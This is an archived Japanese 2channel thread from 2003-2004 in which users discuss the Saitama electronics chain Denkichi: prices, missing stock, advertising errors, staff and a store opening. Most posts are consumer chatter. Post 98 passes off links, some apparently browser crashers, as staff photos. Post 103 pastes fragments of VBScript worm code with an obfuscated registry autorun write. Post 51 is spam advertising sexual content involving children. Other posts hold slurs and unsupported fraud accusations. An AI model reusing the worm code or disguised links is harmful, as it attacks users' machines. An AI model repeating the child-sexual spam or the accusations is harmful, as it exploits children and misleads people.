2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

埼玉のでんきちってどうですか?

1 :でんすけ:03/07/28 16:40
コジマやヤマダよりも安いって噂を時々聞きますが、
実際いい店なんですか?ここは。

2 :でんすけ:03/07/28 16:42
でんきちホームページ
http://www.denkichi.co.jp/index.html

3 :目のつけ所が名無しさん:03/07/28 16:42
ラジカセ買った事あるけどさくらやより安くしてくれたよ。

4 :でんすけ:03/07/28 16:44
すげー!2分でレスがつくとはw
さすが2ちゃんねるだ。

5 :はまだ:03/07/28 19:09
高いし、店内の音楽が五月蝿過ぎてやかましいよね(^m^;

6 :目のつけ所が名無しさん:03/07/28 20:26
はまだって埼玉県民?

7 :目のつけ所が名無しさん:03/07/28 23:02
価格はきちんと対抗してくれるから、
コジマ、ヤマダとあんまり変わらないかもね。

8 :無料動画直リン:03/07/28 23:03
http://homepage.mac.com/miku24/

9 :目のつけ所が名無しさん:03/07/28 23:54
あげ

10 :目のつけ所が名無しさん:03/07/29 00:08
今年中に倒産予定

11 :はまだ:03/07/29 13:00
まさかでんきちのスレがあると思わなかったヨ(^m^)

つーか「でんきちってどうですか」もなにも、
そこらのへんな電器屋よりたちわるいよ。
カタログはろくにおいてないし、
店員は客をさけるし、
きいてもなにもこたえられないし、
ちっともやる気ないし、
なんでまだつぶれてないのかすっごくすっごく摩訶不思議だよ。

>>10
って、今年中もつの?へぇ〜

12 :目のつけ所が名無しさん:03/07/29 21:27
はまだは埼玉の近辺に生息していたのか!!
うわさによるとかなり残業ばかりの会社らしい。
自社のホームページには成長企業と書いてあるけどねw。

13 :目のつけ所が名無しさん:03/07/30 05:14
>>11
そりゃあないわけないでしょう。量販店の代表みたいな存在なんだし。

14 :目のつけ所が名無しさん:03/07/30 05:28
残業休日出勤かなり多いみたいね。
ほかの会社と比べてどうなんだろう。

15 :目のつけ所が名無しさん:03/07/30 16:14
>>11
はまちゃんさあ、「そこらのへんな電器屋」はどこなの?


16 :目のつけ所が名無しさん:03/07/30 23:57
専用スレも出来ちゃって、でんきちも有名になったんだねぇ・・・

http://vip.6to23.com/jpgman/gui/gui.htm
そういえば↑この人、猛烈にでんきち販売員を批判してるね。
ライバル店の人間かもよ?


17 :目のつけ所が名無しさん:03/08/01 15:07
でんきち結構安いよ。
ただ周りにコジマとヤマダがガンガンできてるから
潰れるのは時間の問題かも・・・

18 :山崎 渉:03/08/02 01:16
(^^)

19 :目のつけ所が名無しさん:03/08/03 08:49
いつ行っても客より店員の方が多い

20 :目のつけ所が名無しさん:03/08/03 22:48
でんきちってすっげー店員が押し売りしてきませんか?
値段は安くしてくれるみたいなんですけど。
ちょっとあの勢いはひくよ。

21 :目のつけ所が名無しさん:03/08/03 22:51
でんきちは「電機のキチガイの略です」とヤマダの浦和店の
従業員が教えてくれましたけど、本当ですか?

22 :目のつけ所が名無しさん:03/08/03 22:58
でんきちスタッフ募集中!(^^)
http://www.denkichi.co.jp/

23 :目のつけ所が名無しさん:03/08/03 23:12
>>20
そうかな?
むしろヤマダやコジマの方がしつこいような。

>>21
ヤマダ浦和店って埼大通りと第2産業のどっちかな?

24 :目のつけ所が名無しさん:03/08/04 19:14
コジマ、ヤマダより3パーセント値引き保証。
安くていいね!

25 :目のつけ所が名無しさん:03/08/04 19:21
あげ

26 :目のつけ所が名無しさん:03/08/04 20:12
押し売り反対

27 :目のつけ所が名無しさん:03/08/04 21:23
でんきちダメだよ。あそこは全然在庫置かなくて、予約で受けて一ヵ月後に
あやしいとこから開梱品とか、メーカー返品のものとかを仕入れて売ってんの。
人の手あかがいっぱいなのだ!

28 :目のつけ所が名無しさん:03/08/04 23:14
>>27
ホントの話なの?それ、ちょっとこわいね。
値段は安いらしいけど、安いなりのことはあるってことなのか・・・。
うーむ。

29 :目のつけ所が名無しさん:03/08/05 21:26
オウムしんりきょう

30 :目のつけ所が名無しさん:03/08/05 22:43
あげ

31 :目のつけ所が名無しさん:03/08/05 23:07
コジマやヤマダよりは全然マシだね。店員が若干押し売りぎみだけどね。値段は安いよ。在庫も少なそうだね。

32 :目のつけ所が名無しさん:03/08/05 23:10
>>11
マツモト工作員だけあって攪乱がうまいな、はまだ。


33 :目のつけ所が名無しさん:03/08/06 15:49
あげ

34 :目のつけ所が名無しさん:03/08/06 21:06
あげ

35 :目のつけ所が名無しさん:03/08/06 21:56
ま、買わないのが無難でしょう

36 :はまだ ◆vdeYQZXuts :03/08/07 16:22
>>35
ははは
     なるほど(^m^)

37 :目のつけ所が名無しさん:03/08/07 23:51
はまだってはばひろく出現するな。っていうかマジででんきちなんていったことあるのか?

38 :目のつけ所が名無しさん:03/08/08 13:05
あげ

39 :目のつけ所が名無しさん:03/08/08 16:59
>>27
確かに、在庫なさすぎ。特に広告の特価品とか。
最初から売らないつもりなんじゃないかと思うほど。

40 :はまだ ◆vdeYQZXuts :03/08/08 17:52
>>37
ありますとも(^m^)

>>39
同感です
売るつもりがあるのか?と思う店員ばっかり。
家電店に行ってあんなになにも買う気がしなかったのは初めてでつ。

41 :目のつけ所が名無しさん:03/08/08 18:09
>>40
まったく売る気がないわけでもなさそうだけどね。
何か見てるとすぐ話しかけてくるし。
でもちょっとうっとおしいかな。

42 :目のつけ所が名無しさん:03/08/08 18:12
はまだ=埼玉在住のヒッキー

43 :目のつけ所が名無しさん:03/08/08 19:56
コジマ、ヤマダより3パーセント値引き保証って書いてあるし、
ためしに、コジマ、ヤマダの特価をメモして買いに行ってみるといいかも。
そこで、別の商品をオススメしてきたり、対応できないなんていわれたら
間違いなくDQN確定でしょ。

44 :目のつけ所が名無しさん:03/08/08 20:19
家電版ローカルルール
・量販店・電気店関係の限定された地区のことは街BBSへ、

街BBS
http://www.machibbs.com/

45 :目のつけ所が名無しさん:03/08/08 21:08
>>44
でんきちは東京にもあります

46 :目のつけ所が名無しさん:03/08/08 22:02
あげ

47 :目のつけ所が名無しさん:03/08/08 23:04
埼玉でんきちと神奈川ワットマン、どっちが先に倒産するの??
いい勝負しているような感じだが?

48 :目のつけ所が名無しさん:03/08/09 00:49
でんきちをバカにするなあ!

49 :目のつけ所が名無しさん:03/08/09 03:03
>>47
通報しますた。
ワットマソはJASDAQ上場だから、風説の流布はいかんよ。

50 :目のつけ所が名無しさん:03/08/09 03:06
>>49
人生倒産組

51 :ホゲェホゲェ:03/08/09 03:14
小・中学生のマンコがいっぱい!!グチョグチョだよ♪
詳しくはこちら→http://e-rebirth.com/af/in.cgi?id=30

52 :目のつけ所が名無しさん:03/08/09 22:35
あげ

53 :目のつけ所が名無しさん:03/08/09 23:54
あげ

54 :目のつけ所が名無しさん:03/08/10 23:09
でんきちって家電業界のなかでも数少ない成長企業だよな。コジマとかヤマダ、全然ダメじゃん。

55 :目のつけ所が名無しさん:03/08/12 01:16
あげ

56 :目のつけ所が名無しさん:03/08/12 09:15
>>54
でんきちアフォ社員ハケーン

裏でいろいろやってるくせに成長株ときた
みててあきれるわい

57 :目のつけ所が名無しさん:03/08/13 00:23
でんきちは経営がうまいからなあ。尊敬しちゃいますね。

58 :目のつけ所が名無しさん:03/08/13 01:06
でんきち安いし、店員は親切だし。
将来大きくなるんじゃないかな。

59 :目のつけ所が名無しさん:03/08/13 01:25
すごいよね、でんきち。コジマ、ヤマダよりも
ぜんぜん安く買えるよ。

60 :目のつけ所が名無しさん:03/08/13 08:28
>>58-59
でんきち安い訳じゃないし、店員は馬鹿だし。
チンコ大きくなるんじゃないかな。
すごいよね、でんきち。コジマ、ヤマダと比べて
ぜんぜんポイントなしで結果は高額販売なんだよ。


61 :目のつけ所が名無しさん:03/08/13 09:41
>>59
そりゃそうだよ 仕入れルートがすごいんだから

62 :目のつけ所が名無しさん:03/08/13 10:40
でんきちに入社してチンコ大きくするかな

63 :目のつけ所が名無しさん:03/08/13 10:52
そんなにちっちゃいんだ(プッ

でんきちなんかに入らなきゃだめなほど?

64 :目のつけ所が名無しさん:03/08/14 18:55
でんきちで9000円のデジ亀(100万画素)や
9万円のダイナブックを買いました。

メーカー返品っぽいのが多いけど、結構つかってます。

65 :目のつけ所が名無しさん:03/08/14 22:31
ヤマダとコジマの社員はでんきちに価格調査に行くみたいだね。そんなにでんきちの安さを恐れているんだね。まあ、仕方ないかあんなに安いんじゃ。

66 :目のつけ所が名無しさん:03/08/14 22:53
パソコン買いたいけどやっぱりでんきちかなや。

67 :目のつけ所が名無しさん:03/08/14 23:04
っていうか何であんなに安いの?やっぱり裏があるの?

68 :目のつけ所が名無しさん:03/08/15 01:45
あるよ

なきゃやってらんないよ、実際。

69 :目のつけ所が名無しさん:03/08/15 02:11
数ヶ月前に進展ができると新聞発表されてた。

70 :目のつけ所が名無しさん:03/08/15 02:13
>>69
お前の死亡説も発表された!ばんざ〜い!!

71 :山崎 渉:03/08/15 12:18
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

72 :高麗社呉:03/08/15 19:36
>>70
そんなこと、本当でも言うなよっ

まぁ「進展」するかどうかは別問題だよな

73 :目のつけ所が名無しさん:03/08/15 23:17
でんきち新店オープンらしいですね。けっこう大型店なんですよね。すごい成長企業だよね。正直びっくりですね。わたしもよく買い物しますよ。(^-^)v

74 :目のつけ所が名無しさん:03/08/15 23:51
チラシにポイント値引き対応の企業を刺しているが、クーポン券発行企業と
ポイント値引き対応企業、何がちがうのか?

75 :目のつけ所が名無しさん:03/08/17 23:04
っていうかでんきち言うことなしだよ。
値段安いし、店員さんは親切だし。


76 :目のつけ所が名無しさん:03/08/18 00:18
>>75 チラシの商品なかったし、店頭表示に『現金の場合、7-15%更に値引き』
となっていたが、全く、対応しなかったぞ。
店頭ののぼりに児島さんより3%価格保証って、全く対応なしだった。

77 :目のつけ所が名無しさん:03/08/18 01:57
>>76
それは大変だったね。

78 :目のつけ所が名無しさん:03/08/21 22:27
リア工で、就職のためにここに応募したんですけど、求人票見ると去年は採用20人枠に200人の志願者
がきたみたいで。やはり高卒の低学歴では、内定は無理ですかね...。あきらめた方がいいでしょうか?


79 :目のつけ所が名無しさん:03/08/22 14:24
でんきちは学歴は関係ないよ。
要は商売上手かどうかってことです。
お客さんに好かれるには人柄がとても大事だと思います。
まあ、確かに応募者は山ほどいるし、採用枠は狭いのかもしれませんが。
一応成長している企業だし、いまどき正社員募集っていう電気屋さんも
少ないからいいんじゃないでしょうか?
ただしこれだけは言っておきますけど、勤務時間はけっこう長いです。
体力に自信がない人は残業無しのところを探すといいと思います。

80 :目のつけ所が名無しさん:03/08/22 14:29
>>75
でんきちさんが言うことなしだって???
変なこと言うな<ゲラゲラ

カタログもろくになけりゃ、店員だっていなかったぞ
聞こうとするとまったく質問に答えられないし
在庫だって把握してなかったぞ
こんなんで言うことなし?
言っても無駄だってことか<ゲラゲラ

81 :目のつけ所が名無しさん:03/08/22 19:25
>>79
残業なしのとこなんてねーだろヴォケ
どうせ働くんなら働きたいとこで覚悟きめて働け

82 :78:03/08/23 13:46
>>79
レスサンクスです。なんとか頑張ってみます。 

83 :はまだ:03/08/23 17:48
あほくさ(^m^)

84 :目のつけ所が名無しさん:03/08/27 18:00
>>81
あるよ

85 :目のつけ所が名無しさん:03/08/27 22:08
社員の人も書き込みしようよ〜

86 :目のつけ所が名無しさん:03/08/28 23:37
あげ

87 :目のつけ所が名無しさん:03/08/29 00:09
でんきちってすごくいいですね。
パソコン買いに行ったんですけど、最初はポイントとかないし
どうなんだろうと思っていたけど、
ポイントがないかわりにマジ安い!!
ポイントいらないって人はここへ行ったほうがいいよ。

88 :目のつけ所が名無しさん:03/08/29 21:13
デジカメ買いに行ったら売り切れだった…しかも入荷は2週間後だって。
広告みたら5年保証(3万以上の品)があるらしいけど、どんな内容なんだろう…
だれか知ってる人いない?

89 :目のつけ所が名無しさん:03/08/29 23:46
3万円以上の商品はパソコンとパソコン周辺機器などをのぞいて
すべてメーカー保証が5年に延長されるよ。

90 :目のつけ所が名無しさん:03/08/30 14:52
>>87
ポイントいらない
保障もいらない
説明もいらない
どこの商品でもいい
アフターは気にしない

・・・人ならここへきてください。

91 :目のつけ所が名無しさん:03/08/30 15:18
今日の広告にDVDレコーダーが5980円って書いてあったんだけど、
プレーヤーじゃなくて本当にレコーダーなのかな?

92 :目のつけ所が名無しさん:03/08/30 15:37
聞けよ
電話くらいあんだろーが

93 :目のつけ所が名無しさん:03/08/30 23:16
>>90
どこへ?

>>91
どこのメーカーのかな?国内のメーカーじゃないよね。
安すぎてあやしくないですか?それ。

94 :目のつけ所が名無しさん:03/09/01 11:13
この会社なにげに儲かってるっぽいね

95 :目のつけ所が名無しさん:03/09/01 11:41
☆北海道、東北☆ 
デンコードー           http://www.denkodo.co.jp/    
☆関東、甲信越☆ 
 ケーズデンキ         http://www.ksdenki.com/ 
 コジマ             http://www.kojima.net/
 さくらや            http://www.sakuraya.co.jp/cgi-bin/inetcgi/shop/sakuraya.jsp?BV_UseBVCookie=no
 サトームセン       http://www.satomusen.co.jp/
 ソフマップ         http://www.sofmap.com/shop/default.asp
 ビックカメラ        http://www.biccamera.co.jp/        
 ヤマダ電機         http://www.yamada-denki.jp/stores/webshop/top/indexshop.html 
 ヨドバシカメラ       http://www.yodobashi.com/
 ラオックス          http://www.laox.co.jp/
 ワットマン         http://www.wattmann.co.jp/  
☆中部☆
 エイデン          http://www.eiden.co.jp/home/top/index.asp
 ギガスカンサイ      http://www.gigas.co.jp/
 すみや           http://www.sumiya.co.jp/he/elp.html
☆関西☆
 上新電機           http://jmall.joshin.jp/servlet/emall.odr_wp?WP_ID=TOP
 ナカヌキヤ          http://www.nakagawa-musen.co.jp/
 ニノミヤ           http://www.ninomiya.co.jp/
 マツヤデンキ        http://www.matsuyadenki.co.jp/
 ミドリ電化           http://www.midori-denka.co.jp/index.html  
 八千代ムセン電機      http://www.ym-d.co.jp/
 和光電気           http://www.wakodenki.net/top.html 
☆中国九州☆
 デオデオ          http://dcc.deodeo.co.jp/dccs/store
 ベスト電器          http://www.bestdenki.ne.jp/
 Mr.MAX        http://www.mrmax.co.jp/   

96 :目のつけ所が名無しさん:03/09/01 15:19
でんきちの社員写真を発見、随分古い写真だな
http://www2.strangeworld.org/uedakana/sahra6147.jpg

97 :目のつけ所が名無しさん:03/09/01 20:04
>>95
でんきち   http://www.denkichi.co.jp/index.html

98 :目のつけ所が名無しさん:03/09/01 20:35
でんきちの社員写真
ttp://mbspro5.uic.to/user/mikkixi.html
ttp://www3.coara.or.jp/~keiich69/2002/crashme.html
ttp://www.geocities.co.jp/Technopolis-Mars/9078/burak4.htm
ttp://i.tosp.co.jp/i-landimage/NAL/G/A164/P1640317N11.gif
ttp://i.tosp.co.jp/i-landimage/NAL/G/A164/P1640317N11.gif
ttp://www2.strangeworld.org/uedakana/sahra6138.jpg
ttp://www2.strangeworld.org/uedakana/sahra7438.jpg
ttp://i.tosp.co.jp/i-landimage/NAL/G/A164/P1640317N11.gif
ttp://isweb43.infoseek.co.jp/play/x-team/
ttp://v_insania.tripod.co.jp/html/browser_crasher13.htm
ttp://anagami.hp.infoseek.co.jp/i/ero.html
ttp://www.hamq.jp/stdB.cfm?i=gazorockmanexe&pn=2


99 :目のつけ所が名無しさん:03/09/02 22:31
あげ

100 :高麗社呉:03/09/02 23:20
>>93
でんきちに来いって事じゃないのか?
ちゃんと読めよ、お前さん。

>>94
いや、実際きちきちらしい。
まぁいろいろやっちゃってるからヤバイんじゃないの?

101 :目のつけ所が名無しさん:03/09/02 23:27
いろいろやってるって何を?

102 :目のつけ所が名無しさん:03/09/03 02:20
車でんきち 









あげ

103 :目のつけ所が名無しさん:03/09/03 16:59
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

104 :目のつけ所が名無しさん:03/09/03 23:52
あげ

105 :目のつけ所が名無しさん:03/09/04 22:24
あげ

106 :目のつけ所が名無しさん:03/09/05 00:01
あげ

107 :目のつけ所が名無しさん:03/09/05 00:14
            ヘ-+------+--+-----+ヽ_
          /:::|:::::::|:::::::::::::/::::::/::::::::::::::/:::::::/`\_
       / ̄\::::::|:::::/:::......-―――--..........__/:::::::::::::::\
   ┌ー ̄::::::::::::ヽ::|:::..-^ ̄            ^ ヽ、:::::::::\
   ヽ::::::::::::::::::::::::::::/                  \::::::::ヽ
    ヽ:::::::::::::::::::::::/             ::::       \:::::ヽ
    ヽ::::::::::::::::::/              ::::::::        \::::|_
     ):::::::::::::::|              ::::*:::::        ヽ:|::::ヽ
     /::::::::::::::::|              ::;;;;:          l::::::::ヽ
    /::::::::::::::::::|             ノ::ii:ヽ::          l::::::::::|
    |::::::::::::::::::::|            /::::;リ:::l::::         |::::::::::::|
    |:::::::::::::::::::::l           ...l::::;リ:::/::         /:::::::::::::|
    .|::::::::::::::::::::::l          . /:ア/:::        /:::::::::::::::i
    l:::::::::::::::::::::::::l          ./::`^:::::        /:::::::::::::::::/
    ヽ::::::::::::::::::::::::l         /::::::::::        /:::::::::::::::::::/
     /:::::::::::::::::::::::l        /:::::::::::::      /::::::::::::::::::::::/
     /::::::::::::::::::::::::i __-ー--=;;;::::::::::::::  ....::::/:::::::::::::::::::::::/      
    ./:::::::::::::::::::::::::::i":::::::::::::::  ヾ─ 、/"ヽ:/::::::::::::::::::::::::::::l           
     ヽ::::::::::::::::::::::丶::::::::::   /   il   .ヽ:::::::::::::::::::::::::::/
       \::::::::::::::::::::ヽ:::::::  /    l !    ヽ:::::::::::::::::::/


108 :目のつけ所が名無しさん:03/09/05 15:16
あげ

109 :目のつけ所が名無しさん:03/09/06 00:32
あげ

110 :目のつけ所が名無しさん:03/09/07 00:34
あげ

111 :目のつけ所が名無しさん:03/09/07 00:53
で、倒産はいつ頃の予定なの?

112 :目のつけ所が名無しさん:03/09/07 01:27
でんきちは成長企業なんだよ。ナメんな。

113 :目のつけ所が名無しさん:03/09/07 23:57
あげ

114 :目のつけ所が名無しさん:03/09/08 00:13
>>112
いや、僕は倒産はいつ頃の予定なのかと聞いているのですが…
今年中ですか?
来年まで持ちそうですか?

115 :目のつけ所が名無しさん:03/09/08 00:25
>>114
>>112はキミに話してるんじゃないと思うよw

116 :目のつけ所が名無しさん:03/09/08 00:29
そうだったか。
で、倒産はいつ頃の予定なの?


117 :目のつけ所が名無しさん:03/09/08 00:34
誰か相手してあげてくださいw

118 :目のつけ所が名無しさん:03/09/08 02:00
早く倒産してほしいね



119 :目のつけ所が名無しさん:03/09/08 14:07
あげ

120 :目のつけ所が名無しさん:03/09/08 19:32
販売員の質が悪いね。
交渉中、ワキガと口臭がきつくて逃げて帰って来た。
あれじゃ誰も買わないよ。

121 :10チャンネル:03/09/08 21:11
や-っと見つけたぞ!
って社員出て来い言うから出てきました。
たしかにでんきちは、店や店員によって、あたりはずれはあります。
派閥もあります。
DVDレコーダー?レコーダーです。
でも広告の載せ間違いで5980円にしてしまいました。
クーポン券?あるけど、出すと赤字だから客から言われるまでは発行しません。

122 :目のつけ所が名無しさん:03/09/08 21:24
>>121
??
DVDレコーダーはホントはレコーダーを売り出すつもりではなかったけど
広告に間違えてのせてしまったからしかたなく5980円で出してしまったと
そういう意味ですか?
でも客としてはそういう掘り出し物がたびたび出てくれると
とてもありがたいのですがw
たまにチラシチェックしてみるかな。w

123 :目のつけ所が名無しさん:03/09/09 00:16
あげ

124 :目のつけ所が名無しさん:03/09/09 10:56
販売員の質が悪いね。
「今日僕の売上が悪くて〜」
ぜってー買わねーよ

125 :てst:03/09/09 11:01
つぇえt」「

126 :目のつけ所が名無しさん:03/09/13 23:05
あげ

127 :目のつけ所が名無しさん:03/09/15 00:34
あげ

128 :目のつけ所が名無しさん:03/09/15 00:37
あれ?まだ倒産していなかったの?
こりゃ驚きだ!
(@o@)!

129 :目のつけ所が名無しさん:03/09/15 00:48
かなり急成長しているよ。
何をそんなに驚いているの。

130 :目のつけ所が名無しさん:03/09/16 00:01
倒産どころかかなり儲かってるよ。

131 :目のつけ所が名無しさん:03/09/16 00:08
話題性も無いし、面白くもなんともない販売店だよな。
スレが立ったり、意味も無くあげたりする理由がわからん。
まだワットマンの方がマシかもよ?
なんなんだ?おまえら??

132 :目のつけ所が名無しさん:03/09/16 00:32
>>131
ひがむな

133 :目のつけ所が名無しさん:03/09/16 05:54
本当かね。

134 :目のつけ所が名無しさん:03/09/16 09:02
>>132
訳わかんねぇ…
もしかして馬鹿ぁ?

135 :目のつけ所が名無しさん:03/09/16 19:15
お前が一番、ひがみ馬鹿じゃん

136 :目のつけ所が名無しさん:03/09/16 19:23
本当、ほんとだチョーひがみ妄想。プ

137 :目のつけ所が名無しさん:03/09/16 19:26
ひがみ馬鹿とかひがみ妄想お前のことだよ
わかってる?

138 :目のつけ所が名無しさん:03/09/16 19:30
>>134
さっきからのひがみ馬鹿とかひがみ妄想この人のことでしょ

139 :目のつけ所が名無しさん:03/09/16 19:31
>>134
さっきからのひがみ馬鹿とかひがみ妄想この人のことでしょ

140 :目のつけ所が名無しさん:03/09/16 19:32
ひがみ馬鹿とかひがみ妄想お前のことだよ
わかってる?

141 :目のつけ所が名無しさん:03/09/16 20:17
もしかすると、でんきち店員ってものすごく頭悪いのか?
ほんと馬鹿みたいな書き込みばっか。
あんたら他の会社で通用しないと思うから、クビにならんようせいぜい頑張りな(w
あ、倒産にも気を付けてなぁ〜 (大笑

142 :目のつけ所が名無しさん:03/09/16 21:23
ウチの近くにもあるよ。
ただ、本当に儲かっているのか?というぐらい客がいない。
埼玉県NO.1の急成長企業というのは信じられない。 

ただ、店員の質は他店に比べればよっぱどマシ。

それと、確かに値段も安い。インチキな○ジマなどより100倍ぐらい正しい。ガンガレ!

143 :目のつけ所が名無しさん:03/09/16 21:37
たしかにほかの店に比べてやる気はありそう。うざいけどねw
ところでさっき転職板に書いてあったんだが、でんきちのどっかの店長って
相当なやくざ物らしいぞ。

平社員ガンガレ!

144 :目のつけ所が名無しさん:03/09/16 22:25
>>141
わかりました。がんばります!

145 :目のつけ所が名無しさん:03/09/17 15:13
>>141
馬鹿だけど頭はいいぞー!少なくともあんたよりは(超大笑い


146 :目のつけ所が名無しさん:03/09/17 15:25
>>141
無能で通用しないのは、あなただって
あなたの会社でみんな言ってるらしいですよ
(本当に使えないってね)笑



147 :目のつけ所が名無しさん:03/11/08 11:02
今日の広告でお得なものがあったので
買いに行ったんですよ。(5980円の14型ステレオテレビ)
そして家に帰ってあけてみると・・・モノラルですた・・・。
説明を求めたら、「広告の掲載ミスです。」とか言ってました。
その一言で偽り商品出すのはいかがなものかと?

148 :目のつけ所が名無しさん:03/11/09 23:18
このあいだ、チラシのデジカメがないので、聞いたら
『3週間お待ちいただける方へのお値段です。』
それっておかしくないですか?

149 :目のつけ所が名無しさん:03/11/09 23:34
あれ?倒産したんじゃなかったけ? >でんキチガイ

150 :目のつけ所が名無しさん:03/11/13 02:01
( ´_ゝ`) 蕨店の転調は態度は童貞

151 :目のつけ所が名無しさん:03/11/13 02:08
( ´_ゝ`) 蕨店の転調の息は、トンカツの腐った臭い

152 :目のつけ所が名無しさん:03/11/19 11:02
>>147
確かにでんきちは広告の掲載ミスは多いな。

>>151
トンカツの腐った臭いなんて知ってる人いねーよw

153 :目のつけ所が名無しさん:03/11/24 18:50
小平に出店。看板設置済み いつOPEN?。

154 :目のつけ所が名無しさん:03/11/28 22:27
五日、金曜10時
PS2-\9800

155 :目のつけ所が名無しさん:03/11/30 23:41
9800円て開店前なのになんでわかんの?

156 :目のつけ所が名無しさん:03/12/01 07:05
でん基地で買って今使ってる加湿器はファン式って言ったのに
ファン式スチーム加湿器じゃねーじゃん
嘘つきでん基地の店員は氏ね。

157 :目のつけ所が名無しさん:03/12/01 12:57
>>153
12月5日ちっちゃくオープン

158 :目のつけ所が名無しさん:03/12/04 07:32
>>157
折り込み広告入ってきた。
地図がめちゃくちゃ。
その程度の店と理解してよろしいか?

159 :目のつけ所が名無しさん:03/12/05 06:09
>158
よろしい!

160 :目のつけ所が名無しさん:03/12/05 06:28
★☆★もうすぐクリスマス★☆★
http://marimo.s6.x-beat.com/marimo.html

161 :目のつけ所が名無しさん:03/12/05 10:14
物凄い並びです!

162 :目のつけ所が名無しさん:03/12/05 11:58
>161
店員さ〜ん オープン特売情報キボンヌ!

163 :161:03/12/05 13:27
>>162
近所の住人なだけで店員じゃないぞw。
だけど特別君に教えてあげよう!
プレステ2¥9,800!どうだ?!

うちも狙ってる商品が特価で出たら並ぶつもりだったんだけど
チラシ見てたいしたもの無いよなぁ〜と思って並ぶのやめた。
だけどどんなものかなって開店前に見てみたら凄い列だったよ!<マジよ。

164 :目のつけ所が名無しさん:03/12/05 17:08
今朝でんきち小平店の列に並んだ者だけど、店員の誘導&指示がメチャクチャ。
2列に並ばせたのはまだいいとしてもどっちが何の列かの説明すらない。
並ばされた客は困惑。勝手に前に行く人も出てくるし一般通行人にとっては道を塞がれてじゃま。
並んでる人とケンカまで始める始末。
どの商品の整理券がなくなった等の説明も一切ないから寒空の下イライラだけ募る。
そもそも店員が店周辺から列に向かって出て来ない。

もう二度とこんな店行きません。自分は呆れて帰りました。あまりにお粗末な開店でした

165 :目のつけ所が名無しさん:03/12/05 20:02
>>163-164
サンクス!やっぱ電基地ですなー

この近辺はハードオフとサトムセしかないので便利かと・・・

166 :目のつけ所が名無しさん:03/12/05 21:11
ほんと電基地だよ 今日のあの心ない対応 ありえねえ
あと自分とこのホームページくらい更新しろよ いつまで東大宮店オープンなんだよ
ケンちゃんラーメンかよ

167 :目のつけ所が名無しさん:03/12/06 04:45
でんきちの折込チラシに載ってる「さらに大幅値引き」って
どれくらい引いてくれるの?

168 :目のつけ所が名無しさん:03/12/07 03:39
本日でんきち小平店開店三日目..2時前の時点で20人以上野宿してたよ…
子連れの母さんいた…子供風邪引くよ…(ToT)¥380のたこ焼き器欲しいのかな…
そこまでする価値あるかな〜?? 
LGのビデオ(ステレオ/モノラル表記ナシ)カナーリ安いんだけど…


169 :目のつけ所が名無しさん :03/12/07 09:22
PC○ポ→ハー○オフ→島○HS→でんきち

コジマ小○・東○和・東久○米まで逝かなくてすみそうならイイ!

170 :のつけ所:03/12/07 10:19
家電買うとき価格.COMの値段をプリントして持って言って合わせてくれたら
買うといって回った。
コジマ・ヤマダは無理といわれたがでんきちは、合わせてくれた。
もちろん買った。

171 :目のつけ所が名無しさん:03/12/08 17:10
>>170
それマジか?何買ったよ?
場合によっちゃあ価格.comにここのログもプリントして買いに行くぞ!

172 :目のつけ所が名無しさん:03/12/08 22:59
他の電気屋で交渉する時の為にでんきちの広告には頑張って欲しい


173 :目のつけ所が名無しさん:03/12/09 15:15
>>171
2ちゃんねるのログをプリントして
対応してくれる電気屋なんてありえないと思うがw

174 :目のつけ所が名無しさん:03/12/28 17:36
>>たまたま一致したと思うよ
全て合わせる事は不可能です。そんことをつづけていたら
多分来年の今日は存在していないでしょう。


175 :目のつけ所が名無しさん:03/12/31 15:42
お客を惑わさないチラシ、接客で
来年も逝き残ってください、、、、、

176 :目のつけ所が名無しさん:03/12/31 17:45
年末に一言 おい小平店!!
確かにこの辺の住民は、都民であることに多少の後ろめたさを感じて生きている。
だからって、県下No.1成長率だの、県下No.1価格だの、そんなに埼玉を前面に出すなっての。
東京だか埼玉だかわからなくなるジャネーカ!! 埼玉みてーなもんだけどよ。
しかも、レシートの店名 蕨店のままだし。(たぶん特価用の移動可能なレジ)

あと、自転車置き場ちゃんと作れ。埼玉県人は車しか使わねーカモ知れないが
この辺はチャリマンセーなんだから。

蛍光灯 島忠より200円も高いぞ。ヨーカドーと同じってどういうこった。

以上

177 :目のつけ所が名無しさん:04/01/01 06:14
MDプレーヤーすごい安いと思うのですがもうけはあるんですか?

178 :目のつけ所が名無しさん:04/01/02 13:20
日替わり超特価品を買う為には何時ぐらいから並んだらいいかな?

179 :目のつけ所が名無しさん:04/01/08 10:04
古代ラテン一年もつかな?
近所でインクカートリッジ買うのに便利なんだけど、どうも雰囲気が悪い。

180 :目のつけ所が名無しさん:04/02/23 16:55
でんきちの店員は馬鹿ばっかり。


181 :目のつけ所が名無しさん:04/02/23 17:00
でんきちは裏で相当悪い事やってるらしい。
あそこで買うとろくなことないよ。
俺もだまされたし。最悪だよ!

182 :目のつけ所が名無しさん :04/02/23 19:24
>181
小○店で怒鳴ってオジーンですか?

183 :目のつけ所が名無しさん:04/02/23 20:07
>>181
だまされたってどういうことですか?

184 :目のつけ所が名無しさん:04/03/01 20:12
>>180
キミもw

>>181
悪い事って何ですか?
でたらめを言わないように。
何をだまされたのか具体的に言ってください。


>>182
意味不明

小平店で流れてる音楽ってパチンコ屋みたいだな。

185 :いい気分さん:04/03/01 21:01
おい!小○ 台数限定ってホントーに台数分確保してるのかyo。

186 :目のつけ所が名無しさん:04/03/01 22:34
申し訳ございません
台数限定分の在庫は始めからありません
お客を呼ぶ為の手段でげす
でも予約すれば必ず手に入ります(2Week以上待ちますが)
K/Ks/Y/N/PCデより必ずおやすくしますよ〜ん

187 :目のつけ所が名無しさん:04/03/02 21:12
>>186
まともな仕入先の無い店ですね
盗難品か金融物を販売しているお店ですかね?
法律違反にならないんですかね?

188 :目のつけ所が名無しさん:04/03/03 19:23
>>187
適当なことをいわないように。
それが本当の話ならきちんとした根拠も書き込むように。
どうせ他店社員の嫌がらせ書き込みだろ。

